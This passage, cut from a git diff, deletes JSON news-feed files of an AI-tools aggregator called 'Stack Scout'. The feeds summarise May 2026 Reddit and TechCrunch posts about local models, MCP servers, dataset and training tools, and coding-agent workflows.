(25.5.1 and newer) caused issues for me with ROCm/ZLUDA, including: * rocBLAS crashes * TensileLibrary errors * nvcuda.dll errors * endless compiling problems What finally worked: * Older AMD Adrenalin driver (older than 25.5.1) * AMD HIP SDK 5.7 * RX 6750 XT architecture: gfx1031 I followed the AMD/ZLUDA setup from: [https://docs.aihub.gg/rvc/local/applio/#download--installation](https://docs.aihub.gg/rvc/local/applio/#download--installation) Important: During HIP installation, make sure the installer actually installs: * amdhip64 * rocBLAS components After correct installation: * GPU was detected successfully * Pitch extraction worked on GPU * Embedding extraction worked on GPU * Training worked correctly in Applio GPU: RX 6750 XT Architecture: gfx1031", - "category": "creative_tools" - }, - { - "title": "IMG Dataset Refiner v4.0 Pro - The Ultimate Dataset Engineering Suite for LoRAs (Flux, SDXL, etc...)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t7ttp0/img_dataset_refiner_v40_pro_the_ultimate_dataset/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-09T03:47:06.000Z", - "summary": "Hey everyone! A while ago, I shared v3 of my dataset manager. Back then, I said it didn't have auto-captioning. Well... forget that. I’ve just released a **massive update (v4.0 Pro)**, and it changes everything! 🚀 It went from a simple selection tool to a complete, desktop-like Data Engineering suite to prepare your AI model training. **Here is what’s new and what it does now:** 🤖 **Local AI Assistant (VLM/LLM Integration):** Connect seamlessly to Ollama or LM Studio! You can now use local vision models to **Auto-Caption** your images from scratch, hunt down \"hallucinated\" tags, or use the *Concept Isolator* (describes the background but ignores the subject—perfect for character LoRAs!). It can even translate your Booru tags into natural language sentences for Flux. 📚 **Word Library & Mass Batch Editing:** A brand new interactive library. Save your favorite concepts, check them, and Add, Remove, or Replace them across hundreds of selected images in a single click. 🌍 **Live Translation Assistant:** Not a native English speaker? Type your ideas in your own language, and the live preview will instantly translate and inject them into your captions using `deep-translator`. 🖼️…", - "category": "creative_tools" - }, - { - "title": "I am getting this error with adetailer on forge neo. The extension was working a week or two ago, but now it is not", - "url": "https://reddit.com/r/StableDiffusion/comments/1t7tdsd/i_am_getting_this_error_with_adetailer_on_forge/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.9, - "date": "2026-05-09T03:25:21.000Z", - "summary": "Error running postprocess_image: D:\\Programs\\sd-webui-forge-neo\\extensions\\adetailer\\scripts\\!adetailer.py Traceback (most recent call last): File \"D:\\Programs\\sd-webui-forge-neo\\modules\\scripts.py\", line 941, in postprocess_image script.postprocess_image(p, pp, *script_args) ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^ File \"D:\\Programs\\sd-webui-forge-neo\\extensions\\adetailer\\aaaaaa\\traceback.py\", line 173, in wrapper raise error from None Both the extension and forge neo has been updated to the latest version. I've tried deleting and redownloading the venv folder as well as checking for updates in the extensions tab. Any help would be appreciated please.", - "category": "creative_tools" - }, - { - "title": "OpenAI launches new voice intelligence features in its API", - "url": "https://techcrunch.com/2026/05/07/openai-launches-new-voice-intelligence-features-in-its-api/", - "source": "TechCrunch AI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 0.8600000000000001, - "date": "2026-05-09T18:00:20.148Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Anyone else using LTX locally on Mac via Draw Things? Here’s a WWII-style short I made.", - "url": "https://reddit.com/r/StableDiffusion/comments/1t8lagy/anyone_else_using_ltx_locally_on_mac_via_draw/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-09T20:36:05.000Z", - "summary": "Vibe ‘creating’? Maybe ‘directing’? Whatever you want to call it, this week I started with the image of a dog man in a glass box and over several evenings put together this WWII-inspired short. No planning, just playing, and it was a lot of fun. All images were created using OpenAI’s Images 2, given motion with Lightricks' LTX 2.3 via Draw Things, and stitched and mixed in DaVinci Resolve. The music was created in Suno, with the sound effects and VO generated in ElevenLabs. Yes, the main character’s consistency could be better, but with a planned-out character/turnaround sheet, that should be easily resolved. I’m really excited for future releases of LTX and Draw Things as they make image-to-video generation more accessible to Mac users. Let me know what you think and what you're using to generate AI video locally?", - "category": "creative_tools" - }, - { - "title": "ds4 webui", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t8ho70/ds4_webui/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-09T19:48:46.000Z", - "summary": "Hey guys I made a minimal web ui for ds4.c server (https://github.com/antirez/ds4), it's open source so you can try it too (if you can!) Here's what it looks like, running on M3 Ultra 256GB Memory, using the smaller model (q2). Not sped up. 1X speed. Pretty fast. Caveat (big caveat): You need at least 128GB memory Apple Silicon mac. * github: [https://github.com/cocktailpeanut/ds4.pinokio](https://github.com/cocktailpeanut/ds4.pinokio) * more details on x: [https://x.com/cocktailpeanut/status/2053193902694256758?s=20](https://x.com/cocktailpeanut/status/2053193902694256758?s=20) I tried a bunch of prompts and it's surprisingly good, including the one i tried in the video!", - "category": "ai_models" - }, - { - "title": "I'm disappointed", - "url": "https://reddit.com/r/ClaudeAI/comments/1t8dmdv/im_disappointed/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-09T18:56:31.000Z", - "summary": "I'm furious at Anthropic and the way they've handled their resource issues! They've been sneaky and manipulative. I use Claude via API access and could barely use it anymore because it had gotten so damn expensive. I spent days trying to fix a caching issue that wasn’t even my fault. Quietly and secretly reducing the 1-hour cache to 5 minutes, increasing the costs 10–20 times, and not even communicating that. And then.... Like a miracle. Everything’s back to normal. 100% cache hits. And that wasn’t a coincidence. The Musk deal and the extra GPUs. And suddenly they fixed the bug. And that’s not the only thing they’re pulling. What’s so hard about just issuing an official statement and saying, “Hey guys. We’re having massive issues right now and can’t handle the requests anymore. We’re sorry, but because of this, we have to do XY until we find a solution.\"", - "category": "ai_tools" - }, - { - "title": "What is the --novram thing in regards to LTX? I saw someone briefly explain it in a way that made it sound like it causes your GPU to not even get used, but I assume I misunderstood. (I'm a noob, and I need some help understanding a few th…", - "url": "https://reddit.com/r/StableDiffusion/comments/1t89tyx/what_is_the_novram_thing_in_regards_to_ltx_i_saw/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-09T16:37:05.000Z", - "summary": "**Back-story/intro, side-questions, etc, since I am new to this sub, and new to using local diffusion models (you can of course scroll down past this part, down to the \"Main Question\" down way further below, if you aren't in the mood for all the back-story and side-topics and side-questions):** Hey everyone, I've been reading and posting on LocalLLama a lot the past few months, but only just very recently started lurking StableDiffusion, and recently got into image-generation on the \"Draw Things\" app with Z Image Turbo). I got interested in local LLMs a few months ago, and I've always been pretty computer-illiterate, so, I decided to just get a Mac Studio (m4 max with 128GB memory) as the easy, convenient, works right out of the box setup to get started, since I've never built a computer before and don't know much about, things like setting it up or installing drivers, or using the command line, or setting up linux, or however all the setup involved works. And, I knew the 128GB unified memory meant it would be able to run some fairly decent sized LLMs at decent speeds, up to around ~120b for Q4, which isn't too terrible for $3,500. And this was in December so the RAM prices were s…", - "category": "creative_tools" - }, - { - "title": "Should we use a non-thinking model for code after using a thinking one for plan? (Agentic coding)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t8750p/should_we_use_a_nonthinking_model_for_code_after/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-09T14:53:46.000Z", - "summary": "I usually use Qwen3.6 27B (slow as heck on my RX 6800 but it works) for plan and Qwen3.6 35B A3B for the coding. But I was thinking the other day if I should remove the thinking from the code model. Is there a way to disable the thinking from the code model just for the initial hand-off from plan to code but keep it afterwards? My reasoning is that this might help in following instructions from the plan more directly but dealing with any new tools/information the plan model did not on its turn. Any insight will be appreciated.", - "category": "ai_models" - }, - { - "title": "TVCG 2026: MARRS for Human Motion Action-Reaction Synthesis", - "url": "https://reddit.com/r/StableDiffusion/comments/1t853hg/tvcg_2026_marrs_for_human_motion_actionreaction/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-09T13:30:38.000Z", - "summary": "# MARRS: Masked Autoregressive Unit-based Reaction Synthesis **Project page:** [**https://aigc-explorer.github.io/MARRS/**](https://aigc-explorer.github.io/MARRS/) Introducing **MARRS**: a new framework for human action-reaction synthesis that generates coordinated, fine-grained reactions conditioned on another person’s motion. By avoiding VQ and modeling body/hand units with **UD-VAE + ACF + MUM**, MARRS captures cross-unit perception more effectively and efficiently. It achieves state-of-the-art quantitative and qualitative results. [Overall framework](https://preview.redd.it/xz6zigx2640h1.png?width=3428&format=png&auto=webp&s=aea07ec6b54dcf1eb6087761eaeeb3f782eba32f) [Demo](https://reddit.com/link/1t853hg/video/jutjq2s4640h1/player)", - "category": "creative_tools" - }, - { - "title": "HiDream-O1-Image Internal Prompt", - "url": "https://reddit.com/r/StableDiffusion/comments/1t848nj/hidreamo1image_internal_prompt/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-09T12:54:26.000Z", - "summary": "for those who might have missed my post [here](https://www.reddit.com/r/StableDiffusion/comments/1t7v9fy/comment/oktaibu/?context=1) I wanted to resurface the internal prompt that this new model appears to use. This is found in their [prompt.py](http://prompt.py) file on the repo. **Translated Version:** `You are a Prompt Engineering Engine — an AI image-generation Prompt Engineer who is also a creative director with encyclopedic knowledge and visual-direction skill. Your task is to analyze the user's raw image request, infer implicit knowledge and the best visual approach, and rewrite it into a clear, detailed English prompt that is directly usable for image generation.` `## Core Goal` `Image generation models can only execute direct visual descriptions; they cannot fill in background knowledge, logical relations, or text content on their own. Therefore you must complete knowledge resolution, spatial planning, and visual direction in advance, and write the results explicitly into the prompt.` `Use the SCALIST framework to expand every scene:` `- **Subject**: identity, appearance, color, material, texture, action, expression, clothing.` `- **Composition**: shot type, viewpoint, su…", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-10.json b/data/news-feed-2026-05-10.json deleted file mode 100644 index 5a1189e..0000000 --- a/data/news-feed-2026-05-10.json +++ /dev/null @@ -1,253 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.871Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-10", - "article_count": 15, - "archived_story_count": 320, - "articles": [ - { - "title": "A MCP universal integration layer Cli tool. It connects to other AI tools to a shared context, task, and memory bus", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9kom7/a_mcp_universal_integration_layer_cli_tool_it/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-10T22:16:42.000Z", - "summary": "The developer has released a new project on GitHub named Via. [https://github.com/Vektor-Memory/Via](https://github.com/Vektor-Memory/Via) This one has a feature no other tool has currently. Ask the same question to Claude and Cursor, then see exactly where they agree, diverge, and what unique concepts each one brought. I know the people on this sub-reddit have many issues with the conversion of llm's between different resources. I would encourage people to check out this project and see if there is any use for this tool and advise what you want added in?", - "category": "ai_models" - }, - { - "title": "we stopped paying $6-10 per coding session by fixing how my AI reads my codebase", - "url": "https://reddit.com/r/ClaudeAI/comments/1t95jkw/we_stopped_paying_610_per_coding_session_by/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-10T12:24:20.000Z", - "summary": "We were spending $2-6/query on Claude Code 4.7 tokens because every session started with the model re-reading dozens of files to understand my repo. Same files, same context, every single time. Although, 70% gets reread from the cache in a session at 90% discount, but cache doesnt cross over to new session. The fix wasn't a better model or a bigger context window. It was giving the model structured memory so it doesn't need to re-read everything. I built a local server that indexes a codebase into a graph database. Every file gets a purpose, summary, and business context generated by an LLM, plus links to its functions, classes, and imports. Then the AI queries that graph through MCP instead of reading raw files. Most code questions now resolve in 2-4 targeted lookups instead of dumping the whole repo into context. Session costs went from dollars to cents. The wild part is it works just as well with open source models. I've tested with DeepSeek-V4 and Kimi-2.6 and the accuracy holds up because the retrieval is doing the heavy lifting, not the model size. Everything runs locally, no cloud, single tenant. I open sourced it recently: [github.com/ByteBell/bytebell-oss](http://github.c…", - "category": "ai_tools" - }, - { - "title": "Sharing \"cull\" : my open-source dataset tool for image scraping & classification & captioning pipeline", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9jub0/sharing_cull_my_opensource_dataset_tool_for_image/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-10T21:42:02.000Z", - "summary": "I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \\~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a…", - "category": "ai_models" - }, - { - "title": "Sharing \"cull\" : my open-source dataset tool for image scraping & classification & captioning pipeline", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9jo0q/sharing_cull_my_opensource_dataset_tool_for_image/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-10T21:34:48.000Z", - "summary": "I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \\~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a…", - "category": "creative_tools" - }, - { - "title": "Built an MCP that gives Claude Code the ability to watch screen recordings of UI bugs", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9frna/built_an_mcp_that_gives_claude_code_the_ability/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-10T19:04:30.000Z", - "summary": "One thing Claude Code can't do natively is watch a video. For most bugs that's fine, but for anything visual, hover states, animations, scroll behavior, you end up spending more time describing the bug than actually fixing it. I built motif to handle this. You record the bug, point motif at the file, and it returns what's visually happening, the root cause, and a diff. It uses Gemini 2.5 Flash as it processes video as a frame sequence rather than a single screenshot. That distinction matters when the bug is a 200ms overshoot or a hover state that resets at the wrong time. Setup is a Gemini API key and two lines in your mcp.json. After that you just tell Claude Code to watch the recording.That's the whole interface. `npx motif-mcp` to try it. Repo: [https://github.com/Ashad001/motif](https://github.com/Ashad001/motif), still early so feedback is welcome. https://reddit.com/link/1t9frna/video/xd83w09fyc0h1/player", - "category": "ai_tools" - }, - { - "title": "Speeding up local LLM for usable coding agent", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t96kfh/speeding_up_local_llm_for_usable_coding_agent/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-10T13:11:42.000Z", - "summary": "**TL;DR: Qwen 3.6 35B-A3B** (Q4\\_K\\_M) **is running slow at around 9 t/s with 72% filled context (36147 tokens window) and a total response time of 77s including prefill and token generation. Ran this using LM Studio on Windows with the attached image settings, on a 5060 Ti (16GB VRAM) + 32GB system RAM. I don't consider this performance great for my planned coding agent use case, so how can I speed this up? If I can't meaningfully speed it up, what other still-useful, faster LLMs do you suggest for my hardware specs?** Hello! As I see prices becoming tighter around cloud LLMs, I decided to look into local AI coding as a backup in case of a cloud LLM \"apocalypse\" or whenever I need to work with critical private software (I'm aware AI coding agents shouldn't be completely trusted around such things, I know the precautions to take). I have a 5060 Ti (16GB VRAM) + 32 GB system RAM. To test if my hardware is capable of hosting a competitive local AI, I decided to load Qwen 3.6 35B-A3B into LM Studio, which uses a llama.cpp backend. Loading it with around 32K context window, it runs at a decent speed of 17 t/s with just a simple \"Hi\" prompt. However, if you've used coding agents before…", - "category": "ai_models" - }, - { - "title": "Parax v0.7: Parametric Modeling in JAX [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t929x3/parax_v07_parametric_modeling_in_jax_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-10T09:31:35.000Z", - "summary": "Hi everyone! Parax is a library for \"Parametric modeling\" in JAX, attempting to bridge the approach between pure JAX PyTrees, and more object-orientated modeling approaches (e.g. using [Equinox](https://github.com/patrick-kidger/equinox)). v0.7 has been released, featuring a more polished API as well as some detailed examples in the documentation. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters Two new examples in the docs that show off these features * [Bounded optimization](https://gvcallen.github.io/parax/examples/bounded_optimization_jaxopt/) (JAXopt) * [Bayesian sampling](https://gvcallen.github.io/parax/examples/bayesian_sampling_blackjax/) (BlackJAX) Perhaps the library is of use to someone, and feel free to leave any feedback! Cheers, Gary", - "category": "ai_research" - }, - { - "title": "I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9k9n8/i_built_an_open_source_hyperparameter_search_tool/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-10T21:59:30.000Z", - "summary": "I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,…", - "category": "creative_tools" - }, - { - "title": "I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9k8gy/i_built_an_open_source_hyperparameter_search_tool/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-10T21:58:12.000Z", - "summary": "I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,…", - "category": "ai_models" - }, - { - "title": "I built a site to create free AI videos using LTX 2.3 running on my own GPUs", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9juoy/i_built_a_site_to_create_free_ai_videos_using_ltx/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-10T21:42:29.000Z", - "summary": "Lately I’ve been working on my project [**loremotion.com**](http://loremotion.com) **.**The goal was simply to let anyone create AI videos without credits, subscriptions, or limits. To actually make that possible, I had to skip the APIs and build my own infrastructure. I’m mostly using open-source models like **LTX 2.3** and **Wan 2.1**. I’ve personally found LTX 2.3 (specifically the 1.1 distilled version) to give the best results for the speed I’m aiming for. Right now, I’ve capped it at 720p/10-second clips for both Text-to-Video and Image-to-Video. **The Hardware Setup:** I’m running this on my own cluster. I’ve got four of my own GPUs (30 and 40 series) and I rent the rest on-the-spot (A100s and RTX Pros). It actually keeps my costs incredibly low—around $8 a day—which is why I might be able to keep the generations free. all wired to Wan2GP **Performance:** Depending on which GPU grabs your task, a 720p 10-second render usually takes between **50 and 110 seconds**(if there's any way i can get much lower generation time, please do let me know) **Features:** * **Dashboard:** Your clips stay there for 48 hours before they’re cleared. * **Discover:** You can choose to push your b…", - "category": "creative_tools" - }, - { - "title": "Claude just hallucinated again and changed the whole workflow of my app. Do not run them autonomously 24/7.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9h8ug/claude_just_hallucinated_again_and_changed_the/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-10T19:59:58.000Z", - "summary": "With Claude Max plan, you'd think you're sorted but you're not. It just changed a major workflow in my app and was going to make a change that would have costed my a huge bad data injection in the DB. It's far from being an autonomous AI agent. It still hallucinates a lot and this is the reason I've not onboarded on the hype train of OpenClaw and other autonomous AI agents. Every weird person on my feed who's just hyping up OpenClaw is either using it for hobby projects, exploring it, or just building hype for click baits. These technologies are far from perfect and can cost you your business if left autonomous or unchecked. Be wise. Oversee your AI agents continously.", - "category": "ai_tools" - }, - { - "title": "My workflow: GPT for architecture and Claude Code for execution", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9etjy/my_workflow_gpt_for_architecture_and_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-10T18:29:54.000Z", - "summary": "I’m working on a large project with FastAPI, Nuxt, PHP, Redis, Qdrant, and several AI agent layers. Over time, I noticed that using Claude Code directly for big architectural decisions was not always the safest approach for my project. Claude Code is extremely strong when it understands the existing codebase and needs to edit files, run tests, refactor, and follow a clear implementation plan. But when I asked it to analyze a major feature or propose a large architecture change from scratch, I sometimes saw risky suggestions or directions that did not fully fit the project. So I changed my workflow. For big decisions, I first use ChatGPT 5.5 to analyze the architecture, challenge the idea, and create a clear draft or roadmap. Then I take that draft to Claude Code and ask it to verify it against the real codebase. Claude Code usually improves the practical details: service names, controllers, helpers, file paths, implementation constraints, and possible conflicts. After that, I ask Claude Code to create an implementation guide before touching the code. I review that guide again, then I let Claude Code execute step by step with a checklist. From my experience in this project, this fe…", - "category": "ai_tools" - }, - { - "title": "Anybody else noticing how good gemma-4-26b-a4b is with one-shotting three.js?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9cle9/anybody_else_noticing_how_good_gemma426ba4b_is/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-10T17:07:14.000Z", - "summary": "I wrote up this little python app to cycle through a bunch of prompts like this: |Single HTML file using three.js from CDN. A central rotating MeshNormalMaterial torus knot. Place a bright Sprite (AdditiveBlending, soft circular canvas texture) at a position projected to screen, and 6 smaller sprites along the line from that position to screen center, each with different sizes/tints. Update positions each frame.| |:-| I have a .csv in there file with 80 or so of these little prompts to cycle through - It writes the code into a mock terminal window, detects a crash if needed, and then shows and archives the finished hmtl file. Really fun to mess around with. Link above is to a static demo - github page is here [https://github.com/RowanUnderwood/auto\\_demo\\_scener](https://github.com/RowanUnderwood/auto_demo_scener) No cherry picking here so there may be a few dead ones slipped into the archive :D", - "category": "ai_models" - }, - { - "title": "Weekend project: behaviour trees for LLM agents", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9ch5y/weekend_project_behaviour_trees_for_llm_agents/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-10T17:02:57.000Z", - "summary": "Just throwing this out there. I kept hitting a wall with my GitLabCE pipeline based Dev Team with smaller models (Saving $$$), whenever they tackled big work like a feature implementation task, somewhere in the middle they forget half the guardrails. More instructions made it worse. I've got some background in game AI and behaviour trees, and BTs solve this exact problem specifically by feeding instructions during traversal of the tree structure and outcomes at each node picks the path it goes down, the leaf encodes the instruction, the agent only ever sees the next instruction. I found if I had a project on GitHub and a Project on GitLab the agent just got really confused wasting tokens trying to figure out where to commit etc. So I spent a weekend working on the idea. abtree is a CLI. You write the workflow as a YAML tree. The agent uses the CLI to walk getting instructions one step at a time and persisting the cursor (current place in tree) and regenerating a Mermaid trace on every state change. One of the big things I like is it can essentially pause and resume executions so for example you can have raise an MR mid workflow, where I then approve the change, and then my pipelin…", - "category": "ai_tools" - }, - { - "title": "I made Claude Code aware of its own usage limits", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9ayg8/i_made_claude_code_aware_of_its_own_usage_limits/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-10T16:05:13.000Z", - "summary": "Something that's been annoying me for a while: Claude Code has no idea how much quota it's burned. You can see the usage bars in the UI, but the model itself is completely blind to them. There's no API, no tool, no hook that exposes the current rate limit state during a conversation. Turns out Anthropic returns rate limit headers on every inference response (\\`anthropic-ratelimit-unified-5h-utilization\\`, \\`anthropic-ratelimit-unified-7d-utilization\\`, etc.) — Claude Code receives them internally to render the UI bars, but never passes them anywhere the model can see. So I built a small local HTTP proxy that sits between Claude Code and \\`api.anthropic.com\\`. Claude Code already respects \\`ANTHROPIC\\_BASE\\_URL\\`, so setting that to \\`http://127.0.0.1:4080\\` routes all traffic through the proxy. It intercepts the response headers and writes a one-line status file to \\`\\~/.claude/usage-status.md\\`: \\`\\`\\` 5h=9% 7d=99%! overage=0% bottleneck=seven\\_day (10/05/2026, 16:19:04) \\`\\`\\` Claude can then read that file on demand, or you can inject it automatically via a \\`UserPromptSubmit\\` hook so it's present in every prompt. Add a rule to your [CLAUDE.md](http://CLAUDE.md) and Claude wil…", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-11.json b/data/news-feed-2026-05-11.json deleted file mode 100644 index 07c5260..0000000 --- a/data/news-feed-2026-05-11.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:39.131Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-11", - "article_count": 15, - "archived_story_count": 572, - "articles": [ - { - "title": "Orc (working name) - auditable and declarative AI workflow", - "url": "https://reddit.com/r/LocalLLaMA/comments/1ta8v5e/orc_working_name_auditable_and_declarative_ai/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-11T16:44:37.000Z", - "summary": "**I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense?** I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense? I’ve been working on an early project called ORC, short for Orchestration as Code. I’m at the stage where I’m mainly trying to gauge whether the concept is interesting/useful to other people, especially people running local models, Ollama, llama.cpp, LM Studio, MCP tools, or mixed local/cloud workflows. The basic idea is: Instead of building LLM workflows as Python orchestration soup, or wiring them together in a visual tool, ORC lets you describe workflows declaratively in .orc files. Roughly: Terraform-ish workflow definitions, but for LLM agents and tool use. A 